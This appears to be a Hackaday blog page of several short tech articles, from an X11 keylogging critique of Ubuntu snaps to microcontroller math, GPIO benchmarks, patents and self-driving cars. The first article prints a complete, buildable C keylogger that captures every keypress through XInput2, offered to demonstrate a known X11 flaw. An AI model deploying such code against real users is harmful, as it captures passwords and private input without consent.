This Teddy Bear Steals Your Ubuntu Secrets

Ubuntu just came out with the new long-term support version of their desktop Linux operating system. It’s got a few newish features, including support for the “snap” package management format. One of the claims made about “snaps” is that they’re more secure — being installed read-only and essentially self-contained makes them harder to hack across applications. In principle.

[mjg59] took issue with their claims of increased cross-application security. And rather than just moan, he patched together an exploit that’s disguised as a lovable teddy bear. The central flaw is something like twenty years old now: X11 has no sense of permissions, so any X11 application can listen in on the keyboard and mouse at any time, regardless of which application the user thinks they’re providing input to. This makes writing keylogging and command-insertion trojans effortless, which is just what [mjg59] did. You can download a harmless version of the demo from [mjg59]’s GitHub.

This flaw in X11 is well-known. In some sense, there’s nothing new here. It’s only in light of Ubuntu’s claim of cross-application security that it’s interesting to bring this up again.
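Well-known, and trivially easy to demonstrate. Here’s a minimal sketch of our own (not [mjg59]’s code) showing how any unprivileged X11 client can log raw keypresses system-wide through the XInput2 extension; build with gcc snoop.c -o snoop -lX11 -lXi, run it, and type into any other window:

```c
/* snoop.c -- any unprivileged X11 client can do this. */
#include <stdio.h>
#include <X11/Xlib.h>
#include <X11/extensions/XInput2.h>

int main(void) {
    Display *dpy = XOpenDisplay(NULL);
    if (!dpy) return 1;

    int xi_opcode, ev, err;
    if (!XQueryExtension(dpy, "XInputExtension", &xi_opcode, &ev, &err))
        return 1;
    int major = 2, minor = 0;
    XIQueryVersion(dpy, &major, &minor);

    /* Ask for raw key presses on the root window. No special
       privileges are required -- that's the whole problem.    */
    unsigned char bits[XIMaskLen(XI_LASTEVENT)] = {0};
    XIEventMask mask = { XIAllMasterDevices, sizeof(bits), bits };
    XISetMask(bits, XI_RawKeyPress);
    XISelectEvents(dpy, DefaultRootWindow(dpy), &mask, 1);
    XSync(dpy, False);

    for (;;) {
        XEvent e;
        XNextEvent(dpy, &e);
        XGenericEventCookie *c = &e.xcookie;
        if (c->type == GenericEvent && c->extension == xi_opcode &&
            XGetEventData(dpy, c)) {
            if (c->evtype == XI_RawKeyPress) {
                XIRawEvent *raw = c->data;
                printf("keycode %d\n", raw->detail); /* every app's keys */
            }
            XFreeEventData(dpy, c);
        }
    }
}
```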


And the teddy bear in question? Xteddy dates back to the days when it was cool to display a static image in a window on a workstation computer. It’s like a warmer, cuddlier version of Xeyes. Except it just sits there. Or, in [mjg59]’s version, it records your keystrokes and uploads your passwords to shady underground characters or TLAs.

We discussed Snappy Core for IoT devices previously, and we think it’s a step in the right direction towards building a system where all the moving parts are only loosely connected to each other, which makes it possible to upgrade part of your system without upgrading (or downgrading) the whole thing. It probably does enhance security when coupled with a newer display server like Mir or Wayland. But as [mjg59] pointed out, “snaps” alone don’t patch up X11’s security holes.

Embed With Elliot: Keeping It Integral

If there’s one thing that a lot of small microcontrollers hate (and that includes the AVR-based Arduini), it’s floating-point numbers. And if there’s another thing they hate it’s division. For instance, dividing 72.3 by 12.9 on an Arduino UNO takes around 32 microseconds and 500 bytes, while dividing 72 by 13 takes 14 microseconds and 86 bytes. Multiplying 72 by 12 takes a bit under 2.2 microseconds. So roughly speaking, dividing floats is twice as slow as dividing (16-bit) integers, and dividing at all is five to seven times slower than multiplying.

There’s a whole lot of the time that you just don’t care about speed. For instance, if you’re doing a calculation that only runs infrequently, it doesn’t matter if you’re using floats or slow division routines. But if you ever find yourself in a tight loop that’s using floating-point math and/or doing division, and you need to get a bit more speed, I’ve got some tips for you.

Some of these tips (in particular the integer division tricks at the end) are arcane wizardry — only to be used when the situation really calls for it. But if you’re doing the same calculations repeatedly, you can often gain a lot just by giving the microcontroller numbers in the format it natively understands. Have a little sympathy for the poor little silicon beasties trapped inside!
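And as a small taste of that arcane wizardry: division by a constant can be replaced with a multiply and a shift. Here’s a sketch for dividing by 13, with the input-range caveat spelled out in the comments:

```c
#include <stdint.h>
#include <stdio.h>

/* Division by a constant as a multiply and a shift:
   2^16 / 13 is roughly 5042 (13 * 5042 = 65546), so
   (x * 5042) >> 16 equals x / 13 -- but only for x below
   about 6500. Wider input ranges need a wider multiplier. */
static inline uint16_t div13(uint16_t x) {
    return (uint16_t)(((uint32_t)x * 5042u) >> 16);
}

int main(void) {
    /* Spot-check the shortcut against the real division. */
    for (uint16_t x = 0; x < 6500; x++) {
        if (div13(x) != x / 13) {
            printf("mismatch at %u\n", x);
            return 1;
        }
    }
    printf("div13(x) == x/13 for all x in 0..6499\n");
    return 0;
}
```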

Continue reading “Embed With Elliot: Keeping It Integral”

All Prior Art

Disclosed herein is a device for gauging medication dosage. The method may include displaying first, second and third navigation controls. A switch is connected in parallel to the relay contacts and is configured for providing a portion of the input power as supplemental load power to the output as a function of back EMF energy.

We’ve had patents on the mind lately, and have been reading a fair few of them. If you read patent language long enough, though, it all starts to turn into word-salad. But with his All Prior Art and All the Claims websites, [Alexander Reben] tosses this salad for real. He’s got computers parsing existing patents and randomly reassembling them.

Rather than hoping that his algorithm comes up with the next great idea, [Alexander] is hoping to nip the truly trivial ones in the bud. Prior art — the sum of all pre-existing ideas — is enough to disqualify a patent, so if an idea is so trivial that his algorithm could have come up with it, it’s sooner or later going to be off the table.

Most of the results are insane, of course. And it seems to be producing a patent at a rate of about one per 10-15 seconds, so we’re guessing that it’ll take quite a few years for these cyber-monkeys to come up with the works of Shakespeare. But with bogus and over-broad patents filtering through the system every day, it’s not implausible that some day it’ll prove useful.

[Via New Scientist, thanks Frank!]

BeagleBone Pin-Toggling Torture Test

Benchmarks often get criticized for failing to model the real-world situations that we’d like them to. So take what follows in the limited scope for which it’s intended, and don’t read too much into it. [Joonas Pihlajamaa]’s experiments with toggling a hardware pin as fast as possible on different single-board computers can still show us something.

The take-home result won’t surprise anyone who’s worked with a single-board computer: the higher-level interfaces are simply slow compared to direct memory-mapped GPIO access. But really slow. We’re talking around 5 kHz from Python or any of the file-based interfaces to the pins versus 3 MHz for direct access. Worse, as you’d expect when a non-realtime operating system is in the middle, there are glitches on the order of ten milliseconds with all the file-based methods.
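For a taste of what the fast path looks like, here’s a minimal sketch of memory-mapped GPIO access on the BeagleBone Black. The register offsets come from the AM335x reference manual; the choice of P9_12 is ours, and it assumes the pin has already been muxed as a GPIO output:

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* AM335x GPIO1 module registers, from the TI reference manual. */
#define GPIO1_BASE        0x4804C000
#define GPIO_CLEARDATAOUT 0x190
#define GPIO_SETDATAOUT   0x194
#define PIN               (1u << 28)  /* GPIO1_28 = header P9_12 */

int main(void) {
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0) { perror("open /dev/mem"); return 1; }

    volatile uint32_t *gpio =
        mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, GPIO1_BASE);
    if (gpio == MAP_FAILED) { perror("mmap"); return 1; }

    /* Toggle as fast as the bus allows -- megahertz, versus a few
       kilohertz through the sysfs file interface.                */
    for (;;) {
        gpio[GPIO_SETDATAOUT / 4]   = PIN;
        gpio[GPIO_CLEARDATAOUT / 4] = PIN;
    }
}
```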

This test only tells us so much, though, and it’s not really taking advantage of the BeagleBone Black’s ace in the hole, the PRUs — onboard hardware processors that bring real-time IO capabilities to the system. We’d like to see a re-write of the code to take advantage of libpruio, for instance. A 20 MHz square wave is a piece of cake with the PRUs.

Of course, it’s not interacting, which is probably in the spirit of the benchmark as written. But if raw hardware speed on a BeagleBone is the goal, it’s likely that the PRUs are going to feature prominently in the solution.

[Sprite_tm] Gives Near-Death VFD A Better Second Life

[Sprite_tm] picked up some used VFD displays for cheap, and wanted to make his own custom temperature and air-quality display. He did that, of course, but turned it into a colossal experiment in re-design to boot. What started out as a $6 used VFD becomes priceless with the addition of hours of high-powered hacking mojo.

You see, the phosphor screen had burnt-in spots where the old display was left static for too long. A normal person would either live with it or buy new displays. [Sprite_tm] ripped out the old display driver and now drives the row and column shift registers using the DMA module on a Raspberry Pi 2, coding up his own fast PWM/BCM hybrid scheme that can do grayscale.

He mapped out the individual pixels using a camera and post-processing in the GIMP to establish how degraded each burnt-in pixel was. He then re-wrote a previous custom driver project to compensate for each pixel’s diminished brightness in firmware. After all that work, he wrapped the whole thing up in a nice wooden frame.

There’s a lot to read, so just go hit up his website. High points include the shift-register-based driver transplant, the bit-angle modulation that was needed to get the necessary bit-depth for the grayscale, and the PHP script that does the photograph-based brightness correction.

Picking a favorite [Sprite_tm] hack is like picking a favorite ice-cream flavor: they’re all good. But his investigation into hard-drive controller chips still makes our head spin just a little bit. And if you missed his talk on the Tamagotchi Singularity from the Hackaday SuperCon, make sure you drop what you’re doing and watch it now.

The Sincerest Form Of Flattery: Cloning Open-Source Hardware

We’re great proponents (and beneficiaries) of open-source hardware here at Hackaday. It’s impossible to overstate the impact that the free sharing of ideas has had on the hacker hardware scene. Plus, if you folks didn’t write up the cool projects that you’re making, we wouldn’t have nearly as much to write about.

We also love doing it ourselves. Whether this means actually etching the PCB or just designing it ourselves and sending it off to the fab, we’re not the types to pick up our electronics at the Buy More (except when we’re planning to tear them apart). And when we don’t DIY, we like our electrons artisanal, because we want to support the little guy or girl out there doing cool design work.

So it’s with a moderately heavy heart that we’ll admit that when it comes to pre-built microcontroller and sensor boards, I buy a lot of cheap clones. Some of this is price sensitivity, to be sure. If I’m making many different one-off goofy projects, it just doesn’t make sense to pay the original-manufacturer premium over and over again for each one. A $2 microcontroller board just begs to be permanently incorporated into give-away projects in a way that a $20 board doesn’t. But I’m also positively impressed by some of the innovation coming out of some of the clone firms, to the point that I’m not sure that the “clone” moniker is fair any more.

This article is an attempt to come to grips with innovation, open source hardware, and the clones. I’m going to look at these issues from three different perspectives: the firm producing the hardware, the hacker hobbyist purchasing the hardware, and the innovative hobbyist who just wants to get a cool project out to as many people as possible. They say that imitation is the sincerest form of flattery, but can cloning go too far? To some extent, it depends on where you’re sitting.

Continue reading “The Sincerest Form Of Flattery: Cloning Open-Source Hardware”

The Predictability Problem With Self-Driving Cars

A law professor and an engineering professor walk into a bar. What comes out is a nuanced article on a downside of autonomous cars, and how to deal with it. The short version of their paper: self-driving cars need to be more predictable to humans in order to coexist.

We share living space with a lot of machines. A good number of them are mobile and dangerous but under complete human control: the car, for instance. When we want to know what another car at an intersection is going to do, we think about the driver of the car, and maybe even make eye contact to see that they see us. We then think about what we’d do in their place, and the traffic situation gets negotiated accordingly.

When its self-driving car got into an accident in February, Google replied that “our test driver believed the bus was going to slow or stop to allow us to merge into the traffic, and that there would be sufficient space to do that.” Apparently, so did the car, right before it drove out in front of an oncoming bus. The bus driver didn’t expect the car to pull (slowly) into its lane, either.

All of the other self-driving car accidents to date have been the fault of other drivers, and the authors think this is telling. If you unexpectedly brake all the time, you can probably expect to eventually get hit from behind. If people can’t read your car’s AI’s mind, you’re gonna get your fender bent.

The paper’s solution is to make autonomous vehicles more predictable, and they mention a number of obvious solutions, from “I-sense-you” lights to inter-car communication. But then there are aspects we hadn’t thought about: specific markings that indicate the AIs capabilities, for instance. A cyclist signalling a left turn would really like to know if the car behind has the new bicyclist-handsignal-recognition upgrade before entering the lane. The ability to put your mind into the mind of the other car is crucial, and requires tons of information about the driver.

All of this may end up requiring legislation. Intent, and what all parties to an accident “should have known”, are used in court to apportion blame in addition to the black-and-white of the law. When one of the parties is an AI, this gets murkier. How is anyone to know what the algorithm should have been thinking? This is far from a solved problem, and it’s becoming more relevant.

We’ve written on the ethics of self-driving cars before, but simply in terms of their decision-making ability. This paper brings home the idea that we also need to be able to understand what they’re thinking, which is as much a human-interaction and legal problem as it is technological.

[Headline image: Google Self-Driving Car Project]